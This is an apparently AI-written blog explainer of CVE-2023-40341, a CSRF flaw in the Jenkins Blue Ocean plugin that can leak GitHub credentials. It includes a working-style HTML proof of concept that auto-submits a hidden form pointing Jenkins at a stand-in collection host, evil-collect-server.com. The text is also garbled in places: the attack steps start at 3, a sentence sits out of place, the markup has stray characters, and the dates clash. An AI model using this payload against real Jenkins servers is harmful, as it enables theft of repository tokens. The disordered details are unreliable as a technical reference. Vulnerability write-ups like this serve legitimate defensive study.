In late 2023, a serious security flaw was found in the popular Blue Ocean plugin for Jenkins. Labeled CVE-2023-40341, this vulnerability allows external attackers to trick Jenkins into sending requests without the user’s intention. Even worse, it can be used to steal sensitive GitHub credentials from a configured Jenkins job. This post will break down how the exploit works, show you code snippets, and offer references for further reading — all in plain English.
What is Jenkins Blue Ocean?
Jenkins is the world’s most used automation server, usually for continuous integration and delivery. Blue Ocean is a well-known plugin for Jenkins that provides a modern, nice-looking interface for pipelines.
Attacker can capture GitHub credentials tied to a Jenkins job they pick.
In short: If your Jenkins has Blue Ocean up to 1.27.5, an attacker can sneakily trick it into sharing your pipeline's connected GitHub tokens.
References
- Jenkins Security Advisory
- NVD CVE Entry
CSRF Basics
CSRF lets attackers force logged-in users to submit unwanted requests to a web app. If you’re already logged into Jenkins, an attacker can use your browser session to send requests you didn’t approve.
In Blue Ocean
The Blue Ocean plugin uses REST endpoints to connect to resources like GitHub repos. Normally, these should be protected with CSRF tokens (crumbs in Jenkins), but version 1.27.5 and earlier left some endpoints unprotected.
SSRF Scenario
The attacker can create a web page (malicious site) that asks your browser, which is logged into Jenkins, to send a Blue Ocean REST call to a GitHub repo URL they control. Jenkins, trusting you, sends your GitHub credentials/tokens to this URL. The attacker then grabs those credentials from their server.
Attacker tricks victim (via email, malicious site) into visiting a crafted web page.
3. The page auto-submits a form or uses JavaScript to hit Blue Ocean’s “connect” endpoint, specifying a malicious URL controlled by the attacker.
4. Jenkins uses victim’s credentials to contact the attacker URL, sending GitHub tokens in the process.
Let’s look at a simple example using a basic HTML page. This is what the attacker might host
<!-- exploit.html -->
<html>
<body>
<!-- Hidden form auto-submits a POST to the vulnerable endpoint -->
<form action="https://your-jenkins.com/blue/rest/organizations/jenkins/pipelines/vuln-job/credential-store/github/connect"; method="POST" id="exploitForm">
<input type="hidden" name="apiUrl" value="https://evil-collect-server.com/github-api">;
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</body>
</html>
What happens:
The form auto-submits using their session cookies.
- Jenkins’ Blue Ocean plugin connects to https://evil-collect-server.com/github-api using the victim’s GitHub credentials.
- The attacker's server logs the incoming request and extracts the credential/token.
Detecting and Protecting
Check if you’re vulnerable:
Is Jenkins running Blue Ocean 1.27.5 or below?
- Are users connecting GitHub accounts to pipelines/jobs?
Mitigation:
Educate users not to visit unknown sites while logged into Jenkins.
Official Fix:
According to Jenkins Security Advisory 2023-08-16, Blue Ocean was updated to prevent CSRF on affected endpoints. All users should upgrade immediately.
Original References
- Jenkins Security: 2023-08-16 Advisory
- NVD Entry: CVE-2023-40341
- Blue Ocean Plugin: Jenkins Plugins
Summary
CVE-2023-40341 is a dangerous real-world Jenkins flaw that makes GitHub tokens sitting ducks for bad actors. If you care for your code and infrastructure, update Blue Ocean NOW. Remember, CSRF isn’t just jargon — it can lead to credential theft and serious supply chain attacks.
Security is a journey, not a destination. Stay safe!
---
*Written exclusively for this request by an AI security researcher.*
Timeline
Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/18/2023 20:04:00 UTC